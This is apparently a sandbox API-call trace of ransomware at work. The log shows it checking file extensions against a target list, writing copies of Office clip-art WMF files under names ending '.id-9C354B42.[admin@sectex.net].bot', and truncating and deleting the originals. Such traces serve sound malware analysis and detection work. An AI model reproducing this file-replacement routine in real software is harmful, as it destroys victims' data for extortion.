	[0057.362] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0057.362] lstrlenW (lpString=".docx") returned 5
	[0057.362] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0057.362] lstrlenW (lpString=".pdf") returned 4
	[0057.362] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0057.362] lstrlenW (lpString=".xls") returned 4
	[0057.362] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0057.362] lstrlenW (lpString=".xlsx") returned 5
	[0057.362] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0057.362] lstrlenW (lpString=".ppt") returned 4
	[0057.362] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0057.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63
	[0057.362] lstrlenW (lpString=".zip") returned 4
	[0057.362] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0057.363] lstrlenW (lpString=".rar") returned 4
	[0057.363] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0057.363] lstrlenW (lpString=".bz2") returned 4
	[0057.363] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0057.363] lstrlenW (lpString=".7z") returned 3
	[0057.363] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0057.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63
	[0057.363] lstrlenW (lpString=".dbf") returned 4
	[0057.363] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0057.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63
	[0057.363] lstrlenW (lpString=".1cd") returned 4
	[0057.363] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0057.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63
	[0057.363] lstrlenW (lpString=".jpg") returned 4
	[0057.363] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0057.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63
	[0057.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63
	[0057.363] lstrlenW (lpString=".doc") returned 4
	[0057.363] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0057.363] lstrlenW (lpString=".docx") returned 5
	[0057.363] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0057.363] lstrlenW (lpString=".pdf") returned 4
	[0057.363] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0057.363] lstrlenW (lpString=".xls") returned 4
	[0057.363] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0057.363] lstrlenW (lpString=".xlsx") returned 5
	[0057.363] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0057.363] lstrlenW (lpString=".ppt") returned 4
	[0057.363] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0057.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63
	[0057.363] lstrlenW (lpString=".zip") returned 4
	[0057.363] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0057.363] lstrlenW (lpString=".rar") returned 4
	[0057.363] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0057.363] lstrlenW (lpString=".bz2") returned 4
	[0057.364] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0057.364] lstrlenW (lpString=".7z") returned 3
	[0057.364] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0057.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63
	[0057.364] lstrlenW (lpString=".dbf") returned 4
	[0057.364] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0057.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63
	[0057.364] lstrlenW (lpString=".1cd") returned 4
	[0057.364] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0057.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63
	[0057.364] lstrlenW (lpString=".jpg") returned 4
	[0057.364] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0057.364] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0057.364] lstrlenW (lpString="AN00790_.WMF") returned 12
	[0057.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0057.365] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=5684) returned 1
	[0057.365] CloseHandle (hObject=0x1c0) returned 1
	[0057.365] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf")) returned 0x20
	[0057.365] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0057.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0057.366] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.366] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0057.366] GetLastError () returned 0x0
	[0057.366] ReadFile (in: hFile=0x1c0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x1634, lpOverlapped=0x0) returned 1
	[0057.367] WriteFile (in: hFile=0x188, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x1640, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x1640, lpOverlapped=0x0) returned 1
	[0057.369] ReadFile (in: hFile=0x1c0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0057.369] WriteFile (in: hFile=0x188, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0057.369] SetEndOfFile (hFile=0x188) returned 1
	[0057.369] CloseHandle (hObject=0x188) returned 1
	[0057.369] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.369] SetEndOfFile (hFile=0x1c0) returned 1
	[0057.370] CloseHandle (hObject=0x1c0) returned 1
	[0057.370] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0057.370] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf")) returned 1
	[0057.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63
	[0057.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63
	[0057.371] lstrlenW (lpString=".doc") returned 4
	[0057.371] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0057.371] lstrlenW (lpString=".docx") returned 5
	[0057.371] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0057.371] lstrlenW (lpString=".pdf") returned 4
	[0057.371] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0057.371] lstrlenW (lpString=".xls") returned 4
	[0057.371] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0057.371] lstrlenW (lpString=".xlsx") returned 5
	[0057.371] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0057.371] lstrlenW (lpString=".ppt") returned 4
	[0057.371] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0057.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63
	[0057.371] lstrlenW (lpString=".zip") returned 4
	[0057.371] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0057.371] lstrlenW (lpString=".rar") returned 4
	[0057.371] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0057.371] lstrlenW (lpString=".bz2") returned 4
	[0057.371] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0057.371] lstrlenW (lpString=".7z") returned 3
	[0057.371] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0057.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63
	[0057.371] lstrlenW (lpString=".dbf") returned 4
	[0057.371] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0057.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63
	[0057.371] lstrlenW (lpString=".1cd") returned 4
	[0057.371] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0057.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63
	[0057.371] lstrlenW (lpString=".jpg") returned 4
	[0057.371] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0057.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63
	[0057.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63
	[0057.372] lstrlenW (lpString=".doc") returned 4
	[0057.372] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0057.372] lstrlenW (lpString=".docx") returned 5
	[0057.372] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0057.372] lstrlenW (lpString=".pdf") returned 4
	[0057.372] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0057.372] lstrlenW (lpString=".xls") returned 4
	[0057.372] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0057.372] lstrlenW (lpString=".xlsx") returned 5
	[0057.372] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0057.372] lstrlenW (lpString=".ppt") returned 4
	[0057.372] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0057.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63
	[0057.372] lstrlenW (lpString=".zip") returned 4
	[0057.372] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0057.372] lstrlenW (lpString=".rar") returned 4
	[0057.372] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0057.372] lstrlenW (lpString=".bz2") returned 4
	[0057.372] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0057.372] lstrlenW (lpString=".7z") returned 3
	[0057.372] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0057.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63
	[0057.372] lstrlenW (lpString=".dbf") returned 4
	[0057.372] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0057.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63
	[0057.372] lstrlenW (lpString=".1cd") returned 4
	[0057.372] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0057.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63
	[0057.372] lstrlenW (lpString=".jpg") returned 4
	[0057.372] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0057.373] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0057.373] lstrlenW (lpString="AN00853_.WMF") returned 12
	[0057.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0057.373] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=20578) returned 1
	[0057.373] CloseHandle (hObject=0x1c0) returned 1
	[0057.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf")) returned 0x20
	[0057.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0057.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0057.373] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.373] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0057.374] GetLastError () returned 0x0
	[0057.374] ReadFile (in: hFile=0x1c0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x5062, lpOverlapped=0x0) returned 1
	[0057.751] WriteFile (in: hFile=0x188, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x5070, lpOverlapped=0x0) returned 1
	[0057.752] ReadFile (in: hFile=0x1c0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0057.755] WriteFile (in: hFile=0x188, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0057.755] SetEndOfFile (hFile=0x188) returned 1
	[0057.755] CloseHandle (hObject=0x188) returned 1
	[0057.756] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.756] SetEndOfFile (hFile=0x1c0) returned 1
	[0057.756] CloseHandle (hObject=0x1c0) returned 1
	[0057.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0057.757] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf")) returned 1
	[0057.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63
	[0057.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63
	[0057.757] lstrlenW (lpString=".doc") returned 4
	[0057.757] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0057.757] lstrlenW (lpString=".docx") returned 5
	[0057.757] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0057.757] lstrlenW (lpString=".pdf") returned 4
	[0057.758] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0057.758] lstrlenW (lpString=".xls") returned 4
	[0057.758] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0057.758] lstrlenW (lpString=".xlsx") returned 5
	[0057.758] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0057.758] lstrlenW (lpString=".ppt") returned 4
	[0057.758] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0057.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63
	[0057.758] lstrlenW (lpString=".zip") returned 4
	[0057.758] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0057.758] lstrlenW (lpString=".rar") returned 4
	[0057.758] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0057.758] lstrlenW (lpString=".bz2") returned 4
	[0057.758] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0057.758] lstrlenW (lpString=".7z") returned 3
	[0057.758] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0057.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63
	[0057.758] lstrlenW (lpString=".dbf") returned 4
	[0057.758] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0057.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63
	[0057.758] lstrlenW (lpString=".1cd") returned 4
	[0057.758] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0057.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63
	[0057.758] lstrlenW (lpString=".jpg") returned 4
	[0057.758] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0057.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63
	[0057.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63
	[0057.759] lstrlenW (lpString=".doc") returned 4
	[0057.759] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0057.759] lstrlenW (lpString=".docx") returned 5
	[0057.759] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0057.759] lstrlenW (lpString=".pdf") returned 4
	[0057.759] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0057.759] lstrlenW (lpString=".xls") returned 4
	[0057.759] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0057.759] lstrlenW (lpString=".xlsx") returned 5
	[0057.759] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0057.759] lstrlenW (lpString=".ppt") returned 4
	[0057.759] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0057.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63
	[0057.759] lstrlenW (lpString=".zip") returned 4
	[0057.759] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0057.759] lstrlenW (lpString=".rar") returned 4
	[0057.759] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0057.759] lstrlenW (lpString=".bz2") returned 4
	[0057.759] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0057.759] lstrlenW (lpString=".7z") returned 3
	[0057.759] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0057.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63
	[0057.759] lstrlenW (lpString=".dbf") returned 4
	[0057.759] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0057.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63
	[0057.759] lstrlenW (lpString=".1cd") returned 4
	[0057.759] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0057.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63
	[0057.759] lstrlenW (lpString=".jpg") returned 4
	[0057.759] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0057.760] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0057.760] lstrlenW (lpString="AN00914_.WMF") returned 12
	[0057.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0057.925] GetFileSizeEx (in: hFile=0x228, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=10832) returned 1
	[0057.925] CloseHandle (hObject=0x228) returned 1
	[0057.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf")) returned 0x20
	[0057.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0057.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0057.926] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.926] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0058.482] GetLastError () returned 0x0
	[0058.482] ReadFile (in: hFile=0x228, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x2a50, lpOverlapped=0x0) returned 1
	[0058.540] WriteFile (in: hFile=0x1d0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x2a60, lpOverlapped=0x0) returned 1
	[0058.541] ReadFile (in: hFile=0x228, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.541] WriteFile (in: hFile=0x1d0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.541] SetEndOfFile (hFile=0x1d0) returned 1
	[0058.541] CloseHandle (hObject=0x1d0) returned 1
	[0058.541] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.541] SetEndOfFile (hFile=0x228) returned 1
	[0058.542] CloseHandle (hObject=0x228) returned 1
	[0058.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.542] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf")) returned 1
	[0058.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63
	[0058.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63
	[0058.543] lstrlenW (lpString=".doc") returned 4
	[0058.543] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0058.543] lstrlenW (lpString=".docx") returned 5
	[0058.543] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0058.543] lstrlenW (lpString=".pdf") returned 4
	[0058.543] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
